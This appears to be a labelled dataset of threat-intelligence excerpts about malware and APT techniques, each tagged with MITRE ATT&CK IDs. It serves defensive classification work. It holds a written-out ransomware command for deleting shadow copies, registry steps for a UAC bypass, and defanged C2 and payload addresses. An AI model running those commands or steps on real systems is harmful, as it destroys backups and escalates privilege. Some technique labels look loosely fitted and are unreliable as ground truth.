{"text1":"Another tool written in Go, GoldFinder was most likely used as a custom HTTP tracer tool that logs the route or hops that a packet takes to reach a hardcoded C2 server. When launched, the malware issues an HTTP request for a hardcoded IP address (e.g. hxxps:\/\/185[.]225[.]69[.]69\/) and logs the HTTP response to a plaintext log file (e.g. loglog.txt created in the present working directory). GoldFinder uses the following hardcoded labels to store the request and response information in the log file","labels":"['T1119']"}
|
|
{"text1":"Another interesting technique this malware uses is Visual Studio\u2019s Resource Manager. This is a feature built into Visual Studio that allows one to attach basically any file to the original binary and get a pointer to its data with a few simple API calls. Siloscape uses this method to write the Tor archive to the disk, as well as the unzip binary used to open the archive. It also uses Tor to securely connect to its C2","labels":"['T1140']"}
|
|
{"text1":"The source code of SUNBURST was likely sanitized before being included in SUNSPOT. The use of generic variable names, pre-obfuscated strings, and the lack of developer comments or disabled code is similar to what could be obtained after decompiling a backdoored Orion binary, as illustrated in Figure 2, which provides a comparison between the injected source code (top) and a decompilation output (bottom","labels":"['T1027.005']"}
|
|
{"text1":"Ebury sequentially tries the generated domain names until it finds one that has a TXT record set by the operator. To verify the ownership of the domain, Ebury checks whether the TXT record can be decrypted using an RSA public key embedded in its code","labels":"['T1140']"}
|
|
{"text1":"The first backdoor that the TeleBots group relied\u00a0heavily\u00a0on was Python\/TeleBot.A, which was rewritten from Python in the Rust programming language. The functionality remains the same: it is a standard backdoor that uses the Telegram Bot API in order to receive commands from, and send responses to, the malware operator","labels":"['T1102.002']"}
|
|
{"text1":"After the extensive validation described above, the backdoor enters its main execution stage. At its core, the backdoor is a very standard one that receives instructions from the C2 server, executes those instructions, and sends back information. The type of commands that can be executed range from manipulating of registry keys, to creating processes, and deleting files, etc. effectively providing the attackers with full access to the device, especially since it\u2019s executing from a trusted, signed binary","labels":"['T1112']"}
|
|
{"text1":"Get.exe appears to be a custom tool used to scan IP-ranges for HTTP service information. NCC Group and Fox-IT decompiled the tool for analysis. This showed the tool was written in the Python scripting language and packed into a Windows executable file. Though Fox-IT didn\u2019t find any direct occurrences of the tool on the internet, the decompiled code showed strong similarities with the source code of a tool named GetHttpsInfo. GetHttpsInfo scans the internal network for HTTP & HTTPS services. The reconnaissance tool getHttpsInfo is able to discover HTTP servers within the range of a network","labels":"['T1046']"}
|
|
{"text1":"In July 2018, Unit 42 analyzed a targeted attack using a novel file type against at least one government agency in the Middle East. It was carried out by a previously unpublished threat group we track as DarkHydrus. Based on our telemetry, we were able to uncover additional artifacts leading us to believe this adversary group has been in operation with their current playbook since early 2016. Once opened, Excel will retrieve whatever object is at the URL inside the file. These files have most recently been found in use by criminals to deliver commodity RATs such as Flawed Ammyy. In DarkHydrus's case, the preferred payload retrieved in their previous attacks were exclusively open-source legitimate tools which they abuse for malicious purposes, such as Meterpreter and Cobalt Strike. However, in this instance, it appears that this group used a custom PowerShell based payload that we call RogueRobin","labels":"['T1566.001']"}
|
|
{"text1":"Some payloads leveraged DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL. The DLL acts as a stub loader, which loads and executes shell code. BRONZE UNION previously used this technique to enable execution of PlugX and HttpBrowser tools in a way that is challenging for network defenders to detect","labels":"['T1574.002']"}
|
|
{"text1":"To execute the main downloaded payload, the loader tries to masquerade as a legitimate Windows service, claiming in its fake description, that it is used to support packed applications","labels":"['T1036.004']"}
|
|
{"text1":"Prior to downloading secondary payloads, CSPY Downloader initiates an extensive series of checks to determine if it is being debugged or running in a virtual environment, by searching for specific virtualization-related loaded modules, the process PEB structure, various file paths, registry keys, and memory","labels":"['T1497.001']"}
|
|
{"text1":"When executed, the malware first establishes a SOCKS5 connection to 192.157.198.103 using TCP port 1913. The malware sends the SOCKS5 connection request \"05 01 00\" and verifies the server response starts with \"05 00\". The malware then requests a connection to 192.184.60.229 on TCP port 81 using the command \"05 01 00 01 c0 b8 3c e5 00 51\" and verifies that the first two bytes from the server are \"05 00\" (c0 b8 3c e5 is the IP address and 00 51 is the port in network byte order","labels":"['T1104']"}
|
|
{"text1":"PIONEER KITTEN\u2019s namesake operational characteristic is its reliance on SSH tunneling, through open-source tools such as Ngrok and the adversary\u2019s custom tool SSHMinion, for communication with implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP","labels":"['T1572']"}
|
|
{"text1":"This is likely to make it appear as if nothing is amiss to the user (as high CPU usage is a red flag of cryptocurrency-mining malware","labels":"['T1014']"}
|
|
{"text1":"The VBShower backdoor has the same philosophy of the validator version of PowerShower. Its aim is to complicate forensic analysis by trying to delete all the files contained in \u201c%APPDATA%\\..\\Local\\Temporary Internet Files\\Content.Word\u201d and \u201c%APPDATA%\\..\\Local Settings\\Temporary Internet Files\\Content.Word","labels":"['T1070.004']"}
|
|
{"text1":"The VBScript in turn runs rundll32.exe, activating the Cobalt Strike DLL (step #5) using a clean parent\/child process tree completely disconnected from the SolarWinds process. Finally, the VBScript removes the previously created IFEO value to clean up any traces of execution (step #6) and also deletes the following registry keys related to HTTP proxy","labels":"['T1070', 'T1112']"}
|
|
{"text1":"The threat actor also attempted to use OWA account credentials likely acquired during an earlier phase of the intrusion. BRONZE UNION appeared to leverage other compromised infrastructure, presumably to make reentry attempts seem legitimate. This attempt illustrates the importance of thorough planning when conducting an eviction and the need for continuous vigilance for evidence of reentry","labels":"['T1133']"}
|
|
{"text1":"Next, the loader checks that it\u2019s not running in a virtualized environment (VMWare or Hyper-V) or under a debugger. For the hardware virtualization check, the loader obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list","labels":"['T1497.001']"}
|
|
{"text1":"If the bot is running as admin on Windows XP or 7, persistence is established using application shimming [1]. It uses a method very similar to the one described by FireEye in their blog post \u201cTo SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence\u201d [3]. A shim database (SDB) is created (Figure 13) to patch services[.]exe with the loader code and then installed with sdbinst[.]exe","labels":"['T1546.011']"}
|
|
{"text1":"To suppress the User Access Control (UAC) prompt that normally occurs during privilege elevation, the malware uses a UAC bypass technique first documented in August 2016. This bypass requires temporarily setting either the registry key HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command on Windows 10, or the registry key HKCU\\Software\\Classes\\mscfile\\shell\\open\\command on Windows 7 to execute the malware. Once the registry key is set, the malware launches the Windows event viewer process eventvwr.msc, which will inadvertently launch the malware set in the registry keys with elevated privileges","labels":"['T1548.002']"}
|
|
{"text1":"Malicious actors commonly maintain persistence on a victim\u2019s system by installing the malware-as-a-service. Volgmer queries the system and randomly selects a service in which to install a copy of itself. The malware then overwrites the ServiceDLL entry in the selected service's registry entry. In some cases, HIDDEN COBRA actors give the created service a pseudo-random name that may be composed of various hardcoded words","labels":"['T1543.003']"}
|
|
{"text1":"The first stage shellcode contains an interesting NOP sled with alternative instructions, which was most likely designed in such a way to avoid detection by antivirus products looking for large NOP blocks inside flash files","labels":"['T1027']"}
|
|
{"text1":"The C2 server address is not embedded directly inside Tomiris: instead, it connects to a signalization server that provides the URL and port to which the backdoor should connect. Then Tomiris sends GET requests to that URL until the C2 server responds with a JSON object of the following structure","labels":"['T1568']"}
|
|
{"text1":"First, it captures the desktop window and sets the background color to black. It then writes \"All your files are encrypted. For more information see \u201cREADME-FOR-DECRYPT.txt\" with\u00a0DrawText\u00a0API to a bitmap image and saves it as \"encr.bmp\" in the public pictures folder. Finally, it changes the desktop wallpaper to the new image using the\u00a0SystemParametersInfoAPI with the SPI_SETDESKWALLPAPER flag","labels":"['T1491.001']"}
|
|
{"text1":"FIN7 has consistently utilized legally purchased code signing certificates to sign their CARBANAK payloads. Finally, FIN7 has leveraged several new techniques that we have not observed in other CARBANAK related activity","labels":"['T1553.002']"}
|
|
{"text1":"This code invokes time twice, with a sleep in between, then compares whether the difference between the two calls to time matches the amount of time the system slept for, in order to detect sandboxes that patch (speed up) calls to sleep","labels":"['T1497.003']"}
|
|
{"text1":"At the beginning of October 2021, Proofpoint researchers identified public samples of Gamaredon RTF template injection documents which impersonated the Ukrainian Ministry of Defense. This tactic is consistent with\u00a0reporting\u00a0on this APT group that links Gamaredon to the Russian FSB operating in the Republic of Crimea and the city of Sevastopol. The files communicate with the domain pretence77.glorious[.]nonima[.]ru which also was a remote template delivery URL used by several Microsoft Office Word documents that impersonated Ukrainian government organizations. These Office files communicate with actor infrastructure using a URI pattern previously observed among Gamaredon malicious Microsoft Office phishing documents. Specifically, the Microsoft Office documents used remote template injection to retrieve malicious payload files using URIs with the directory \u201c\/ELENAPC\/principles\/\u201d on several occasions. Additionally, in several instances the resources retrieved delivered an MP3 file as a delivery resource","labels":"['T1221']"}
|
|
{"text1":"The main C2 loop starts after the initial upload of the reconnaissance data, iterating once every approximately 30 seconds. For the first five minutes, each iteration will capture a screenshot of the display and upload it to the \"normal\" subdirectory with an encoded timestamp as the filename. After the first five minutes, the screenshot uploads once every five minutes","labels":"['T1113']"}
|
|
{"text1":"Since the FoggyWeb loader version.dll is an unmanaged application, it cannot directly access the virtual runtime environment that the managed AD FS code is executed within. The loader overcomes this limitation and loads the backdoor alongside the AD FS code by leveraging the CLR hosting interfaces and APIs to access the virtual runtime environment within which the AD FS code is executed","labels":"['T1106']"}
|
|
{"text1":"The instrumentor script also performs a cleanup of the cookies for Google Chrome and Microsoft Edge browsers. This activity is performed after the implants are in place to force users to reauthenticate. This is done by simply terminating any browser processes running on the system and then deleting the cookie files on disk","labels":"['T1070.004']"}
|
|
{"text1":"If the bot is running with admin privileges on a Windows version newer than Windows 7, persistence is established using the registry \u201cimage file execution options\u201d method","labels":"['T1546.012']"}
|
|
{"text1":"Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) \u2014 This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. Source: Secureworks) - RarStar \u2014 This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. RarStar HTTP POST request. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. When exfiltration is complete, the uploader (or Datper or xxmm) immediately uses the del command to delete the RAR archives. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity","labels":"['T1573.001']"}
|
|
{"text1":"An analysis of these files found that they all leveraged a remote template injection technique that allows the documents to pull down the malicious code once they are opened. This allows the attacker to have control over what content is sent back to the victim in an otherwise benign document. Recent examples of the remote template \u201cdot\u201d file URLs these documents use include the following","labels":"['T1221']"}
|
|
{"text1":"These anti-forensic recovery commands are quite interesting and appear to make use of an undocumented feature of the vssadmin\u00a0resize command. While the first command in Figure 2 above, vssadmin Delete Shadows \/all \/quiet, is commonly used by ransomware, the command option vssadmin resize shadowstorage is rarely used. In situations where shadow copies were not created by vssadmin, but by third-party applications (such as backup software), vssadmin can display an error and not delete the backups. Try removing them with the backup application which created them. The\u00a0vssadmin resize\u00a0shadowstorage command is a \u201chack\u201d that relies on vssadmin to delete storage when the shadow copies are resized. It forces the shadow copies to be deleted regardless of their context. The command works by resizing the default shadow volume size from 10 percent to 401 MB (the minimum size is 300 MB). Then the shadow storage is set to unbounded, which allows it to use all available\u00a0disk space. The shadow copies are then deleted by calling the command vssadmin Delete Shadows \/all \/quiet a second time","labels":"['T1490']"}
|
|
{"text1":"After initialization, SUNSPOT monitors running processes for instances of MsBuild.exe, which is part of Microsoft Visual Studio development tools. Copies of MsBuild.exe are identified by hashing the name of each running process and comparing it to the corresponding value, 0x53D525. The hashing algorithm used for the comparison is ElfHash and is provided in Python in Figure 1","labels":"['T1057']"}
|
|
{"text1":"The \u201cWmiApCom.bat\u201d file is simply used to start \u201cWmiApCom\u201d, which happens to be the exact same file as the one dropped by the malicious Word documents. However, this is most likely meant to be a mechanism to update the compromised host with a new version of the LOWBALL malware","labels":"['T1105']"}
|
|
{"text1":"Although it has only recently been launched, IcedID already uses redirection attacks. The redirection scheme IcedID uses is not a simple handover to another website with a different URL. Rather, it is designed to appear as seamless as possible to the victim. These tactics include displaying the legitimate bank\u2019s URL in the address bar and the bank\u2019s correct SSL certificate, which is made possible by keeping a live connection with the actual bank\u2019s site","labels":"['T1185']"}
|
|
{"text1":"TG-3390 uses DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL. CTU researchers have observed the threat actors employing legitimate Kaspersky antivirus variants in analyzed samples. The DLL acts as a stub loader, which loads and executes the shell code. The adversaries have used this technique to allow PlugX and HttpBrowser to persist on a system","labels":"['T1574.002']"}
|
|
{"text1":"messengers. Figures 9 and 10 show FakeM attempting to resemble MSN or Yahoo! Messenger traffic, as the first 32-bytes contain data that resemble legitimate traffic generated by these chat programs","labels":"['T1001.003']"}
|
|
{"text1":"At execution, it installs an application-defined Windows hook. The hook gets windows messages indicating when a network drive has been attached. Upon adding a network drive, the hook calls its \u201cRecordToFile\u201d file stealer method","labels":"['T1056.004']"}
|
|
{"text1":"The first way in which the malware can be launched is by hijacking a DLL. Being placed in the same folder as explorer.exe, the wrapper DLL is loaded during the Windows startup into the Windows Explorer process instead of the legitimate library located in the %windir%\\system32 folder","labels":"['T1574.001']"}
|
|
{"text1":"proxy-servers, web-servers, or software update servers. After that, these intermediary servers are used by ProjectSauron as internal proxy nodes for silent and inconspicuous data exfiltration, blending in with high volumes of legitimate traffic","labels":"['T1090.001']"}
|
|
{"text1":"As mentioned in the Hermes to Ryuk section, Ryuk uses a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Without the private key provided by WIZARD SPIDER, the files cannot be decrypted and are unrecoverable. A thread is created for the encryption of each file and each file is encrypted with its own AES key. After the file has been encrypted, a file extension of .RYK is appended to the file. All directories will have a ransom note of (RyukReadMe.txt) written to the directory","labels":"['T1486']"}
|
|
{"text1":"The original variant of FakeM generates network beacons to its C2 server that begin with a 32-byte header that in most cases is meant to blend into network traffic generated by legitimate applications. Following this 32-byte header, the original variant of FakeM includes data encrypted using a custom encryption cipher that uses an XOR key of \u201cYHCRA\u201d and bit rotation between each XOR operation","labels":"['T1573.001']"}
|
|
{"text1":"Carbanak campaigns can also use legitimate programs and remote access software for command and control. They also employ standard non-application layer protocols for communication.","labels":"['T1095']"}
|
|
{"text1":"After this, the Carbanak backdoor can then be used to log keystrokes and capture screenshots, steal and delete cookies, inject malicious code on sites, and monitor various traffic. For lateral movement, the malware abuses remote and system administration tools.","labels":"['T1539', 'T1113', 'T1550.004', 'T1020.001', 'T1056.003']"}
|
|
{"text1":"For FIN7 attack routines, data can be compressed and\/or encrypted before being exfiltrated.","labels":"['T1560']"}
|
|
{"text1":"FIN7 gathers information on network shares.","labels":"['T1039']"}
|
|
{"text1":"The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command (Figure 2) to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command (Figure 3).","labels":"['T1059', 'T1566.001', 'T1059.001']"}
|
|
{"text1":"In Carbanak attacks, the groups\u2019 attacks can involve logging into services that accept remote connections and using stolen password hashes through the \u201cpass the hash\u201d method","labels":"['T1550.002', 'T1110.002']"}
|
|
{"text1":"On the other hand, FIN7 takes advantage of Mshta, a utility that can execute VBScript, and scheduled tasks to run malicious code on user systems.","labels":"['T1053.005', 'T1053', 'T1218.005']"}
|
|
{"text1":"In both Carbanak and FIN7 attacks, communication with users\u2019 compromised systems is done through bypassing firewalls or network detection systems via commonly used ports, using connection proxies to avoid direct connections to the threat group\u2019s infrastructure, employing the command-and-control channel to remotely copy files from an external system, blending in with existing network traffic by using standard application layer protocol, and taking advantage of standard cryptographic protocol to disguise command-and-control traffic.","labels":"['T1090']"}
|
|
{"text1":"Panda Stealer is deployed through spam emails posing as business quote requests to lure unwary victims into opening malicious Excel files. We have identified two infection chains: in one, an .XLSM attachment contains macros that download a loader (Figure 1). Then, the loader downloads and executes the main stealer. ","labels":"['T1598.002', 'T1566.001', 'T1137.001']"}
|
|
{"text1":"FIN7 attacks can inject code into processes and hijack the search order used to load DLL files.","labels":"['T1574.001']"}
|
|
{"text1":"Decoding these PowerShell scripts revealed that they are used to access paste.ee URLs for easy implementation of fileless payloads. The CallByName export function in Visual Basic is used to call the load of a .NET assembly within memory from a paste.ee URL.","labels":"['T1059.005', 'T1059.001']"}
|
|
{"text1":"Carbanak also collects information on accounts, files and directories, group permissions, and registries.","labels":"['T1083']"}
|
|
{"text1":"FIN7 utilizes guardrails to restrict execution and abused utilities that allow indirect command execution that can go past security restrictions","labels":"['T1480']"}
|
|
{"text1":"After moving through the network and identifying assets to target, the next step would be to gather key data. At the collection phase, Carbanak and FIN7 campaigns harvest data from local system sources and through input and screen capture (as performed in a related campaign using the Tirion malware).","labels":"['T1113', 'T1056']"}
|
|
{"text1":"They also add programs to a startup folder that can be referenced with a registry run key. We detected a variant of the Carbanak malware that adds registry entries and keys as an autostart technique. Credentials of existing valid accounts were also abused.","labels":"['T1547.001']"}
|
|
{"text1":"Cobalt Strike was also used to continuously communicate with the main command-and-control (C&C) server.","labels":"['T1587.001', 'T1583.004']"}
|
|
{"text1":"This example of BazarLoader generated command and control (C2) activity, retrieving BazarBackdoor using HTTPS traffic from 104.248.174[.]225 over TCP port 443.","labels":"['T1043']"}
|
|
{"text1":"Use the latest attack patterns, Kubernetes (K8s) or Docker API targeting, which were featured in two reports focusing on TeamTNT operations, Black-T: New Cryptojacking Variant from TeamTNT and Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes.","labels":"['T1588.002']"}
|
|
{"text1":"The attacker then executed a persistent malicious PowerShell code that was used to download and execute another PowerShell backdoor file in the server from the malicious IP address 185[.]82[.]219[.]201, as shown in Figure 7.","labels":"['T1590.005', 'T1059.001', 'T1027.003', 'T1216', 'T1546.013', 'T1059', 'T1064']"}
|
|
{"text1":"The PowerShell command executed after the Microsoft Exchange exploitation is responsible for downloading and executing another PowerShell script from the command-and-control (C&C) server 185[.]82[.]219[.]201","labels":"['T1059', 'T1059.001', 'T1064', 'T1546.013', 'T1059.003']"}
|
|
{"text1":"This PowerShell backdoor was observed to be related to the SystemBC malware as a service. The script has a hard coded C&C server IP address and port number to connect to, with data passed to the \u201cRc4_crypt\u201d function before connection.","labels":"['T1059.001']"}
|
|
{"text1":"In our case study, approximately two minutes after Cobalt Strike activity started, a tool to enumerate an AD environment appeared on the infected host at C:\\ProgramData\\AdFind.exe.","labels":"['T1588.002', 'T1595']"}
|
|
{"text1":"Our analysis shows that the Crimson RAT malware is compiled as a .NET binary with minimal obfuscation. This could indicate that the cybercriminal group behind this campaign is possibly not well-funded.","labels":"['T1140', 'T1001', 'T1588.001', 'T1587.001']"}
|
|
{"text1":"Earth Karkaddan actors are known to use the Crimson RAT malware in its campaigns to communicate with its command-and-control (C&C) server to download other malware or exfiltrate data.","labels":"['T1588.001', 'T1587.001', 'T1583.004']"}
|
|
{"text1":"After downloading and executing these files, one of the child processes created other files and the executable setup.exe\/setup-installv1.3.exe, which was extracted from 320yea_Teamviewer_15206.zip via WinRAR.exe. This file seems to be the source of most of the downloaded malicious files, as seen in the following figure.","labels":"['T1204.002']"}
|
|
{"text1":"The BazarLoader DLL was immediately copied to another location and made persistent through the Windows registry","labels":"['T1547.001', 'T1112', 'T1543.003']"}
|
|
{"text1":"These infections provide backdoor access that criminals use to determine whether the host is part of an Active Directory (AD) environment. If so, criminals deploy Cobalt Strike and perform reconnaissance to map the network","labels":"['T1595', 'T1592']"}
|
|
{"text1":"The malicious Excel spreadsheet was discovered on Wednesday, Aug. 18, 2021, and it has a last modified date of Tuesday, Aug. 17. The filename had an .xlsb file extension. This file has macros designed to infect a vulnerable Windows host with BazarLoader. Figure 2 shows a screenshot of the Excel file.","labels":"['T1137.001', 'T1587.001', 'T1588.001']"}
|
|
{"text1":"Once the executable file is executed, it will proceed to unzip a file named mdkhm.zip and then execute a Crimson RAT executable named dlrarhsiva.exe.","labels":"['T1588.001']"}
|
|
{"text1":"BazarLoader is Windows-based malware spread through various methods involving email","labels":"['T1588.001', 'T1587.001', 'T1566.002', 'T1566.001', 'T1534', 'T1598.002', 'T1566']"}
|
|
{"text1":"The loaded module is a simple dropper. Upon loading the module, the AutoOpen method will be invoked. The malicious code in this method drops the final payload executable into %AppData%\\service.exe and executes it (see Figure 6)","labels":"['T1574.005', 'T1574', 'T1569.002', 'T1543.003']"}
|
|
{"text1":"The spreadsheet\u2019s macro code retrieved a malicious Dynamic Link Library (DLL) file for BazarLoader from the following URL","labels":"['T1204.001']"}
|
|
{"text1":" this Excel template was created by a threat actor trying to instill confidence by taking advantage of the DocuSign brand name and image.","labels":"['T1137.001', 'T1221']"}
|
|
{"text1":"Crimson RAT can steal credentials from browsers, collect antivirus information, capture screenshots, and list victim drives, processes, and directories. We have observed how an infected host communicates with a Crimson RAT C&C server to send exfiltrated information including PC name, operating system (OS) information, and the location of the Crimson RAT malware inside the system.","labels":"['T1592', 'T1589', 'T1590', 'T1125', 'T1555.003', 'T1056', 'T1113', 'T1003']"}
|
|
{"text1":"Cobalt Strike leads to reconnaissance of an infected host\u2019s environment. In our lab environments, this reconnaissance activity can start within a few minutes after Cobalt Strike traffic first appears.","labels":"['T1588.001', 'T1587.001']"}
|
|
{"text1":"In this case, a Cobalt Strike DLL file was sent through Bazar C2 traffic and saved to the infected Windows host under the user\u2019s AppData\\Roaming directory","labels":"['T1564.003']"}
|
|
{"text1":"Cobalt Strike is an adversary simulation platform developed for penetration testers by Raphael Mudge, founder of Strategic Cyber LLC. Designed for interoperability with other platforms such as Metasploit, NMAP, and PowerShell Empire, it can be run using Armitage, a graphical user interface (GUI) developed by Mudge, initially for Metasploit. Armitage and Cobalt Strike are designed around a team server that allows for the sharing of information and the ability to direct and execute well-coordinated actions.","labels":"['T1061']"}
|
|
{"text1":"Even though network monitoring and detection capabilities do not come easy for many organizations, they can generally offer a high return on investment if implemented correctly. Malware has to contact its C2 server if it is to receive further instructions. This article will demonstrate how to detect this communication before threat actors accomplish their objectives. There are a couple of factors that we can utilize to fingerprint any suspicious traffic and subsequent infrastructure. Before we get into that part, we should first discuss what makes Cobalt Strike so versatile.","labels":"['T1102.002', 'T1102.003']"}
|
|
{"text1":"Fifteen minutes after domain enumeration, we observed successful lateral movement to two endpoints on the network. Ten minutes after lateral movement, a PowerShell Cobalt Strike loader executed as a service on a server. Even though the execution was not successful, the threat actors kept trying, a total of eight times, until it finally worked. Windows Defender real-time monitoring was then disabled, the LSASS.exe process was dumped using SysInternals ProcDump, and privilege was escalated to \u201cSYSTEM\u201d using named pipe impersonation.","labels":"['T1569.002', 'T1068', 'T1546.013']"}
|
|
{"text1":"As days go by, more of the reported ransomware attacks turn out to be related to the new Pay2Key ransomware. The attacker followed the same procedure to gain a foothold, propagate and remotely control the infection within the compromised companies.","labels":"['T1189']"}
|
|
{"text1":"SUGARDUMP using SMTP for C2 communication \u2013 dated to late 2021-early 2022. This variant was downloaded from a known UNC3890 C2 (URL: hxxp:\/\/128.199.6[.]246\/3-Video-VLC.exe), and is a slightly more advanced version with similar credential harvesting functionality. ","labels":"['T1041']"}
|
|
{"text1":"Trickbot is the most common malware distributed by Emotet, but it is not the only one. Qakbot is another type of malware frequently dropped on Emotet-infected Windows hosts.","labels":"['T1588.001']"}
|
|
{"text1":"Essentially, the TDSS botnet kad.dll module is more or less the same as cmd.dll in terms of control function. By running nodes.dat files containing a list of IP addresses of Kad clients in addition to ktzerlrules, which contains a command to download a new nodes.dat file from cybercriminal servers, the owners of the botnet can both include their infected computers in the publicly accessible Kad network and remove them from the network. The publicly accessible Kad network contains no more than 10 TDSS infected computers. This makes replacing the ktzerules file as inefficient as possible, which prevents other cybercriminals from taking control over the botnet. The total number of TDSS infected computers on the closed network number tens of thousands.","labels":"['T1059', 'T1588.001', 'T1587.001']"}
|
|
{"text1":"We can apply this same concept across other executable traits, such as BOOSTWRITE\u2019s export DLL name (DWriteImpl.dll), to create quick and easy rules that can aid in quick discovery as seen in Figure 7.","labels":"['T1129']"}
|
|
{"text1":"HenBox attempts to hide itself from the app launcher view by running the following code, passing the parameters COMPONENT_ENABLED_STATE_DISABLED (2) and DONT_KILL_APP (1) to the setComponentEnabledSetting() method.","labels":"['T1564']"}
|
|
{"text1":"As our research technique of fingerprinting exploit writers exceeded our initial expectations, we were on the lookout for more exploits to investigate. Soon enough, we came across this blog post from Kaspersky detailing how Sodin (a.k.a Sodinokibi, or REvil), an infamous ransomware, is using a 1-Day exploit for CVE-2018-8453.","labels":"['T1588.006', 'T1203', 'T1210']"}
|
|
{"text1":"The first spear phish from group \u201cAdmin@338\u201d was sent to a foreign government in the Asian Pacific region on March 10, 2014 \u2013 just two days after the flight disappeared. The threat actors sent a spear-phishing email with an attachment titled, \u201cMalaysian Airlines MH370.doc\u201d (MD5: 9c43a26fe4538a373b7f5921055ddeae). Although threat actors often include some sort of \u201cdecoy content\u201d upon successful exploitation (that is, a document representing what the recipient expected to open), in this case, the user is simply shown a blank document.","labels":"['T1566.001', 'T1203', 'T1566']"}
|
|
{"text1":"However, for version 3 things are different.\u00a0 This is how the report of the email_accounts_grabber module appears for Emotet version 3:","labels":"['T1129', 'T1588.001', 'T1586.002']"}
|
|
{"text1":"Skidmap, a Linux malware that we recently stumbled upon, demonstrates the increasing complexity of recent cryptocurrency-mining threats. This malware is notable because of the way it loads malicious kernel modules to keep its cryptocurrency mining operations under the radar.","labels":"['T1588.001']"}
|
|
{"text1":"APT3\u00a0(also known as UPS), the actors responsible for\u00a0Operation Clandestine Fox\u00a0has quietly continued to send waves of spearphishing messages over the past few months. This actor initiated their most recent campaign on November 19, 2014 targeting multiple organizations. The attacker leveraged multiple exploits, targeting both\u00a0CVE-2014-6332\u00a0and\u00a0CVE-2014-4113. CVE-2014-6332 was disclosed publicly on 2014-11-11 and is a Windows OLE Automation Array Remote Code Execution vulnerability. CVE-2014-4113 is a privilege escalation vulnerability that was\u00a0disclosed publicly on 2014-10-14.","labels":"['T1587.004', 'T1566.003', 'T1534']"}
|
|
{"text1":"In March, we discovered a targeted campaign to distribute Milum, a Trojan designed to gain remote control of devices in target organizations, some of which operate in the industrial sector. The first signs of this operation, which we have dubbed WildPressure, can be traced back to August 2019; still, the campaign remains active. The Milum samples we have seen so far do not share any code similarities with any known APT campaigns. The malware provides attackers with remote control over infected devices, allows downloading and executing commands, collecting and exfiltrating information and installing upgrades in the malware.","labels":"['T1588.001']"}
|
|
{"text1":"We did not observe the initial access for this case but assess with medium to high confidence that a malicious email campaign was used to deliver an Excel (xls) document. Following the opening of the xls document, the initial Qbot DLL loader was downloaded and saved to disk. Interestingly, the name of the DLL contained a .html extension to disguise the portable executable nature of the payload. Once executed, the Qbot process creates a scheduled task to elevate itself to system.","labels":"['T1566.001', 'T1204.002', 'T1566.002']"}
|
|
{"text1":"Although there are no previously known malicious Android applications attributed to the StrongPity group, we strongly believe that the threat actor is in the process of actively developing new malicious components that can be used to target Android platforms.","labels":"['T1505']"}
|
|
{"text1":"SHA256 file hashes for 119 malspam attachments, 30 extracted Redaman executable files, and 30 dropped Redaman DLL files found from September through December 2018. Information is available at: https:\/\/github.com\/pan-unit42\/iocs\/blob\/master\/Redaman_banking_malware\/2018-09-thru-2018-12-file-hashes-for-Redaman-banking-malware.txt .","labels":"['T1566.001', 'T1598.002']"}
|
|
{"text1":"It\u2019s clear from our research that the quality of the WannaCry code is poor and the developers made many mistakes, enabling many of those infected to recover encrypted data. The way the attackers handled ransom payments limited their ability to capitalise on the spread of the worm. Multiple attempts were made to track transactions to the bitcoin wallets used by the attackers. Although estimates of how much money the attackers made vary, they run into tens of thousands, rather than hundreds.","labels":"['T1486']"}
|
|
{"text1":"According to our research partner in Japan, the original EvilPost attack in December 2015 arrived as a spear-phishing email with a Word document attached.","labels":"['T1566.001', 'T1598.002']"}
|
|
{"text1":"In early April, Emotet acquired a module for distribution over wireless networks (MD5: 75d65cea0a33d11a2a74c703dbd2ad99), which tried to access Wi-Fi using a dictionary attack. Its code resembled that of the Network Spreader module (bypass.exe), which had been supplemented with Wi-Fi connection capability. If the brute-force was successful, the module transmitted data about the network to C&C.","labels":"['T1588.001']"}
|
|
{"text1":"We investigated a long-running espionage campaign, dubbed A41APT, targeting multiple industries, including the Japanese manufacturing industry and its overseas bases, which has been active since March 2019. The attackers used vulnerabilities in an SSL-VPN product to deploy a multi-layered loader we dubbed Ecipekac (aka DESLoader, SigLoader and HEAVYHAND). We attribute this activity to APT10 with high confidence. Most of the discovered payloads deployed by this loader are fileless and have not been seen before. We observed SodaMaster (aka DelfsCake, dfls and DARKTOWN), P8RAT (aka GreetCake and HEAVYPOT), and FYAnti (aka DILLJUICE Stage 2) which in turn loads QuasarRAT. In November and December 2020, two public blog posts were published about this campaign. One month later, we observed new activities from the actor with an updated version of some of their implants designed to evade security products and make analysis harder for researchers. You can read more in our public report.","labels":"['T1588.001', 'T1588.006']"}
|
|
{"text1":"Along with the HTTP part, the binary part was also updated. The encryption remained the same, but Emotet dropped Google Protocol Buffer and switched to its own format. The compression algorithm also changed, with zlib replaced by liblzf. More details about the new protocol can be found in the Threat Intel and CERT Polska reports.","labels":"['T1048.003']"}
|
|
